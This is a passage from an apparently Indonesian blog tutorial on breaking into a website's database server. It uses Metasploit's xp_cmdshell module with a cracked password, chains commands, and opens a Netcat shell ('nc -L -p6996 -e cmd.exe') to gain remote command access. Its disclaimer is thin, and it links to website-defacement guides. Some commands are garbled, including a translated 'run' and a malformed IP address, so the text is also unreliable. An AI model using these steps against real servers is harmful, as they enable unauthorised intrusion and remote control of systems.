Dengan demikian maka kamu akan memiliki beberapa variabel kunci yang harus kamu tetapkan termasuk CMD, RHOST serta Password. Kamu bisa mengatur RHOST ke IP server database, password ke kata sandi akun yang dicrack sebelumnya, dan perintah yang harus dijalankan pada shell perintah di server yakni “dir” agar mendapatkan daftar direktory. Pastikan juga bahwa kamu mengetik perinyahny pada diantara tanda kutip tunggal.
Baca Juga : Cara Deface Website Metode Deface XSS Dan SQL
Setelah variabel-variabel tersebut telah ditetapkan maka kamu selanjutnya cukup ketik “run“
msf>jalankan
Mudil tersebut akan mengakses prosedur tersimpan xp_cmdshell meskipun dinonaktifkan dan akan mengembalikan hasil perintah.
4. Langkah keempat, kamu bisa mengirimkan perintah tunggal dengan baik namun tidak boleh ada banyak tindakan yang dapay kamu lakukan dengan satu perintah dengan pengecualian penghapusan file atau del. Kamu dapat mengirimakan perintah dengan meletakan “&” pada antara perintah msf>set CMD ‘cd/ & dir’
5. Langkah kelima, Kamu bisa menjalankan aplikasi tersembunyi. Kamu mungkin telah memperhatikan bahwa admin pada sistem server memiliki Netcat yang dapat dijalankan di derektory root, Mereka mungkin meninggalkannya di sana untuk administrasi jarak jauh atau untuk tugas lain. Setelah itu, kamu bisa menjalankan perintah dibawah ini:
msf > set CMD 'cd \ & nc -L -p6996 -e cmd.exe'
Perintah tersebut akan mengubah direktori ke direktori root tempat Netcat tinggal dan selanjutnya membuka pendengar Netcat pada port 6996 dan menekan shell perintah.
Setelah itu kamu coba untuk terhubung pada Netcat.
msf > ns 192.169.?.?.? 6996
6 Berhasil, kamu sudah berhasil hack database website dengan menggunakan cmd.
Namun, kamu perlu menggunakan cara diatas dengan bijak dan tidak merugikan orang lai atau pihak lain.
Kamu bisa menggunakan cara diatas untuk hal positif seperti untuk digunakan sebagai pembelajaran agar lebih waspada terhadap peretasan website atau untuk mengatasi website yang lupa password atau tidak bisa login dengan normal.
Intinya, sebaiknya kamu gunakan cara diatas dengan baik dan bijak agar bisa bermanfaat dan tidak merugikan.
Baca Juga Deface Exploit Joomla JCE Extension
Nah, itu dia cara meretas website menggunakan cmd dengan ampuh yang bisa kamu gunakan untuk pembelajaran agar lebih berhati-hati dalam pertasan website.
Cara diatas cukup sering diguakan oleh para hacker untuk meretas atau hack suatu website karena memiliki tingkat keberhasilan dalam meretas website cukup tinggi.
Namun, cara diatas juga sangat sensitif, dimana jika salah sedikit saja maka cara diatas bisa gagal. Terima kasih.
